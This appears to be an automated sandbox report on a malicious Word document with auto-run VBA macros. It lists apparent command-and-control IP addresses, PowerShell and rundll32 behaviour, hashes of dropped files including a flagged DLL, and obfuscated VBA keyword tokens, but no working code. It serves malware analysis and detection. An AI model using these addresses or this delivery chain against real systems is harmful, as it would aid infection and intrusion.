                                                                      unknownunknowntrue
                                                                      104.168.154.203
                                                                      unknownUnited States
                                                                      54290HOSTWINDSUStrue
                                                                      190.251.216.100:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      104.131.41.185:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      80.15.100.37:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      81.215.230.173:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      167.71.148.58:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      46.105.114.137:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      110.39.162.2:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      178.211.45.66:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.210.246.253:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      81.214.253.80:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      138.197.99.250:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344894
Start date: 27.01.2021
Start time: 12:16:43
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ARCHIVOFile-20-012021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@32/14@6/100
EGA Information:
• Successful, ratio: 92.3%
HDC Information:
• Successful, ratio: 33.6% (good quality ratio 24.1%)
• Quality average: 58.5%
• Quality standard deviation: 37.9%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 72.247.178.8, 72.247.178.41, 72.247.178.32, 72.247.178.26, 72.247.178.11, 72.247.178.35
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
• Execution Graph export aborted for target powershell.exe, PID 2552 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
12:17:36  API Interceptor  1x Sleep call for process: msg.exe modified
12:17:36  API Interceptor  102x Sleep call for process: powershell.exe modified
12:17:57  API Interceptor  181x Sleep call for process: rundll32.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs


                                                                      Domains


                                                                      ASN

                                                                      Electronic form.docGet hashmaliciousBrowse
                                                                      • 191.6.196.118
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      Attachments E84598.docGet hashmaliciousBrowse
                                                                      • 177.185.196.31
                                                                      http://crupie.com.br/teste/sites/xfiij3985199578140397829dez486w2hd0plzuic/Get hashmaliciousBrowse
                                                                      • 177.185.206.83
                                                                      rapport du 21 sept..docGet hashmaliciousBrowse
                                                                      • 191.6.204.145
                                                                      CRYSTALTECHUSFILE.docGet hashmaliciousBrowse
                                                                      • 75.103.81.81
                                                                      http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                                      • 63.134.242.129
                                                                      DOCUMENTO_MEDICO.docGet hashmaliciousBrowse
                                                                      • 209.200.87.182
                                                                      ULffUM9qZE.exeGet hashmaliciousBrowse
                                                                      • 216.119.106.22
                                                                      https://www.raddelmotalaka.com/wp-include/zimonedrive/Get hashmaliciousBrowse
                                                                      • 63.134.242.129

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
Category: dropped
Size (bytes): 59134
Entropy (8bit): 7.995450161616763
Encrypted: true
SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5: E92176B0889CC1BB97114BEB2F3C1728
SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious: false
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 893
Entropy (8bit): 7.366016576663508
Encrypted: false
SSDEEP: 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5: D4AE187B4574036C2D76B6DF8A8C1A30
SHA1: B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256: A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512: 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious: false
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.0664620025581253
Encrypted: false
SSDEEP: 6:kKCHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:B3kPlE99SNxAhUeo+aKt
MD5: 8AB92BD02DEBE46B03720E9B4E92FEF4
SHA1: 1201275CD8B208AA5FE8B509DD66BD9FE2E53383
SHA-256: 498E98249C1BB06868B90E21DC38041E9BEF547E0763D61F2ECCB86F00FB6404
SHA-512: 85CA865095F251133261FC4054866C8623339E466003BAC5E3C5A94B9018CB05ECC3C55214B98C12BF77C485E76ABFC00D989E477DC59D191C114BC8488783FE
Malicious: false
Preview: p...... ........:..w....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 3.0215269645321685
Encrypted: false
SSDEEP: 3:kkFkllRzEvfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKwIliBAIdQZV7eAYLit
MD5: DC910AE1F9AE675627D93DF168B8B4A7
SHA1: F1812087EE764C1ED12E399B164BDBBEA33235D8
SHA-256: 90278AA59F3EBA385DA5E25B790F7897C21E262DBA2CDC6E08EDBD211A5123A9
SHA-512: 847369ACB7C56ACE8357FD58CAECF72EDE8444A1659343094373B7C5ED39EF82885B4162C8DA3869D8D74F95EF18737845E46C98B045CC659F0B078BA929479B
Malicious: false
Preview: p...... ....`....Y.w....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76E1ED2-1DC6-41B5-9D5C-624688043260}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3554734412254814
Encrypted: false
SSDEEP: 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzL
MD5: 3E5010CAE259871D6964270190F8ADCE
SHA1: C57EA259D1DF1C244C8A4C4D3AC7FA37AEFA1869
SHA-256: F1B89BC47B850CD5352C45E86AEC6F63F6C80F22FA4A9CC589EF18219E6BF8EB
SHA-512: FC6112BB9EF82273E598CF32220CE02EEBC57A9B805E438D3207F5CA7C02C4990E5B5CABF2B1BB7AEF7E9CA69D966DD0E0BD90E2C5B591BBE94FACD3636E2ADD
Malicious: false
C:\Users\user\AppData\Local\Temp\Cab479B.tmp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
Category: dropped
Size (bytes): 59134
Entropy (8bit): 7.995450161616763
Encrypted: true
SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5: E92176B0889CC1BB97114BEB2F3C1728
SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious: false
C:\Users\user\AppData\Local\Temp\Tar479C.tmp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 152788
Entropy (8bit): 6.316654432555028
Encrypted: false
SSDEEP: 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5: 64FEDADE4387A8B92C120B21EC61E394
SHA1: 15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256: BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512: 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCHIVOFile-20-012021.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 19:17:33 2021, length=163328, window=hide
Category: dropped
Size (bytes): 2138
Entropy (8bit): 4.5326539197703415
Encrypted: false
SSDEEP: 48:8b/XT3Inbeh6o3up5Qh2b/XT3Inbeh6o3up5Q/:8b/XLInbXdp5Qh2b/XLInbXdp5Q/
MD5: 05A81D9871CC5A9D1C9496971871A4C3
SHA1: 4B43D1A721FDEED3C350721541F3F032E98057DC
SHA-256: F2631F760EED5D1400F08304FDE9686A689A11AAA5343519DF9F988C18ADA39B
SHA-512: 725EF51348035ACA47084FE0C13FED8AD39801962A1DA3E1854984A78E6769138ACC2874086513B983CC9A9781E9A7E8CCE6B314E3A315826F1106E19158113B
Malicious: false
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):101
                                                                      Entropy (8bit):4.560529244991619
                                                                      Encrypted:false
                                                                      SSDEEP:3:M1+GFVCl8WLFVClmX1+GFVClv:M4G6rL6PG61
                                                                      MD5:BCAC8ED9B42DA8EFA65F54705C070EC9
                                                                      SHA1:F176DE20E4C0A978E9E5E0039B71EA72D94E1C20
                                                                      SHA-256:E0586F37CF5912AC227F6363F87FF700D71C8C2CE24E933C7DB34DEDD9551F3F
                                                                      SHA-512:F66C0695FAD82E6842E9FDC2AAFBE40FE51EC071737B6F2116C7035895DB01C52934DF3256603C88E158F0AA2435C9C273B8960210845BF3B9FF18FD25CF87E9
                                                                      Malicious:false
                                                                      Preview: [doc]..ARCHIVOFile-20-012021.LNK=0..ARCHIVOFile-20-012021.LNK=0..[doc]..ARCHIVOFile-20-012021.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JTN6F3VHEJQWGEUZSLB.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.587203250476091
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCIMqZqvsqvJCwofz8hQCIMqZqvsEHyqvJCworZzv9YyH8f8OZlUVNIu:c2wofz82MHnorZzvyf8OIIu
                                                                      MD5:9AFBC91BB6F8B5858AB7A4886ABC3073
                                                                      SHA1:3F15E4645EB1DF3E393D032664CEDF46A22C5A60
                                                                      SHA-256:5D85266D69AFD60CE498DEBB2375E63D81F2534E6F4104692C11D904D81DCCCA
                                                                      SHA-512:6B5F8AA7CBE4E1EA63654DEA4EC746D3A7C0F588D9CE2A48D500BC3175D9D255FBD806CDDA798C04B6D0FCE2F09295F6755A17F482085DE2460ED1269D4EA324
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):354648
                                                                      Entropy (8bit):4.29030621772406
                                                                      Encrypted:false
                                                                      SSDEEP:3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
                                                                      MD5:039810A34BE3DD45B9D30F89E18F46F4
                                                                      SHA1:5F8609A2DB33D6BB70584E1741F428245474146F
                                                                      SHA-256:A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                                                                      SHA-512:8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: Metadefender, Detection: 46%
                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43, Thumbnail: 21890, 0x17: 917504CDFV2 Microsoft Word
                                                                      Entropy (8bit):6.828949606327576
                                                                      TrID:
                                                                      • Microsoft Word document (32009/1) 79.99%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                      File name:ARCHIVOFile-20-012021.doc
                                                                      File size:163328
                                                                      MD5:d4829a31da294d0ee8f9f67bc1352bd2
                                                                      SHA1:70601272023fd5285194c68da776708508524d50
                                                                      SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5
                                                                      SHA512:4a3e4ba0671890787590e7abb39dbea6e4b70334d6b7ee8aafb9559184c3d650cf8a04711ba3e863b675afb400c9c8512bbd85393ee89cf359766831a6581d1d
                                                                      SSDEEP:3072:1/X2TdcrrXyQBsc0vWJVi4IrwVOfMb2Y/:1/PPIIx2Y
                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "ARCHIVOFile-20-012021.doc"

                                                                      Indicators

                                                                      Has Summary Info:True
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:True
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:True

                                                                      Document Summary

                                                                      Document Code Page:-535
                                                                      Number of Lines:155
                                                                      Number of Paragraphs:43
                                                                      Thumbnail Scaling Desired:False
                                                                      Company:
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:917504

                                                                      Streams with VBA

                                                                      VBA File Name: Bcur5699z4d, Stream Size: 1108
                                                                      General
                                                                      Stream Path:Macros/VBA/Bcur5699z4d
                                                                      VBA File Name:Bcur5699z4d
                                                                      Stream Size:1108
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 92 a6 8c 67 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Xqcxarraokjbi
                                                                      False
                                                                      Private
                                                                      VB_Exposed
                                                                      Attribute
                                                                      VB_Creatable
                                                                      VB_Name
                                                                      Document_open()
                                                                      VB_Customizable
                                                                      VB_PredeclaredId
                                                                      VB_GlobalNameSpace
                                                                      VB_Base
                                                                      VB_TemplateDerived
                                                                      VBA File Name: Nst6otvnmgmpw, Stream Size: 17602
                                                                      General
                                                                      Stream Path:Macros/VBA/Nst6otvnmgmpw
                                                                      VBA File Name:Nst6otvnmgmpw
                                                                      Stream Size:17602
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 a4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ac 05 00 00 9c 30 00 00 00 00 00 00 01 00 00 00 92 a6 3f ad 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      crnYCaC
                                                                      RYtzeF
                                                                      ClofCvn
                                                                      BlbPRi:
                                                                      Left(vpWmJA.Range.ParagraphStyle,
                                                                      BlbPRi)
                                                                      kBCITgNAC.Range.ListFormat.ListString
                                                                      aqFpElJ
                                                                      tFspDCJEJ
                                                                      djUnAEBd.Range.ParagraphStyle
                                                                      QjbRmCII
                                                                      rknGHpIJ
                                                                      RmTjACo
                                                                      jdDhS
                                                                      ah_sg
                                                                      InStr(kBCITgNAC.Range.Text,
                                                                      MscjBIE.Range.ParagraphStyle
                                                                      sDmVCG
                                                                      TpAnAB.Range.Text
                                                                      dUBsAD
                                                                      ORjdHplF.Range.Text
                                                                      ueWFHDCC
                                                                      QpteDQ
                                                                      wNsHseJob
                                                                      DagVrchHi.Range.Text
                                                                      NcnmJ
                                                                      aiupjCA.Range.ParagraphStyle
                                                                      pbPXFg
                                                                      SeBOI
                                                                      wgusFA
                                                                      VrghdcJA.Range.Text
                                                                      vXdLFECJ
                                                                      ElseIf
                                                                      pbPXFg.Range.ParagraphStyle
                                                                      mWRkEDBn
                                                                      swJREBktH
                                                                      Len("xxx"))
                                                                      DagVrchHi
                                                                      GvZhcxcBE.Range.ListFormat.ListString
                                                                      clyZlt.Range.ParagraphStyle
                                                                      kBCITgNAC.Range.Text
                                                                      QurlJAjI
                                                                      ah:wsg
                                                                      Left(ORjdHplF.Range.ParagraphStyle,
                                                                      EGxLDh
                                                                      ifZhJxP
                                                                      BdbvZ
                                                                      InStr(KekJrc.Range.Text,
                                                                      SEEmDH
                                                                      ihnSRH
                                                                      djUnAEBd.Range.Text
                                                                      kYUGGMJ.Range.ListFormat.ListString
                                                                      JJqbCtEH
                                                                      ahpsg
                                                                      InStr(MscjBIE.Range.Text,
                                                                      ZBXzADzi
                                                                      dPYykYG
                                                                      InStr(TpAnAB.Range.Text,
                                                                      TpAnAB.Range.ListFormat.ListString
                                                                      Replace(saw,
                                                                      kBCITgNAC.Range.ParagraphStyle
                                                                      ilrmFI
                                                                      QyjOFbQGB
                                                                      Left(GvZhcxcBE.Range.ParagraphStyle,
                                                                      IGyeHIDF
                                                                      DMzpFn
                                                                      MFcvbrIeP
                                                                      WHeXGpVAC
                                                                      nWADOALQ
                                                                      ORjdHplF.Range.ParagraphStyle
                                                                      clyLjDhC
                                                                      oSnKJGCv
                                                                      ODMoFC)
                                                                      CJIuIYEKI
                                                                      KoPDIC
                                                                      gnnIFFf
                                                                      djUnAEBd.Range.ListFormat.ListString
                                                                      XSZpp
                                                                      QrQLEAI
                                                                      hnsxGG
                                                                      tfnHGB
                                                                      LCIxEHv
                                                                      ORjdHplF.Range.ListFormat.ListString
                                                                      Resume
                                                                      vpWmJA.Range.ParagraphStyle
                                                                      InStr(clyZlt.Range.Text,
                                                                      PAyxzTsC
                                                                      dwTYCJwLC)
                                                                      GLKaFEDcX
                                                                      PEaiK.Range.Text
                                                                      zjQpkF
                                                                      KekJrc.Range.ListFormat.ListString
                                                                      wJKPQpiH
                                                                      Left(kYUGGMJ.Range.ParagraphStyle,
                                                                      ruwfBB
                                                                      QrQLEAI:
                                                                      GHJmFFAIm)
                                                                      golkzCJBD
                                                                      FdSuG
                                                                      OtoVEFFI
                                                                      QrQLEAI)
                                                                      "hqkwjbjdasd"
                                                                      GHJmFFAIm:
                                                                      LEeUqk
                                                                      Left(clyZlt.Range.ParagraphStyle,
                                                                      ZAXDGY
                                                                      KnxFzdf
                                                                      kYUGGMJ.Range.ParagraphStyle
                                                                      ubHTxDED
                                                                      LqcVa
                                                                      Left(djUnAEBd.Range.ParagraphStyle,
                                                                      aqFpElJ.Range.Text
                                                                      GvZhcxcBE
                                                                      twfalBEJ
                                                                      HmUuEIbVG
                                                                      VBA Code
                                                                      VBA File Name: Xxuu21l7kiwbxwj_0, Stream Size: 704
                                                                      General
                                                                      Stream Path:Macros/VBA/Xxuu21l7kiwbxwj_0
                                                                      VBA File Name:Xxuu21l7kiwbxwj_0
                                                                      Stream Size:704

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Attribute
                                                                      VB_Name
                                                                      VBA Code

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
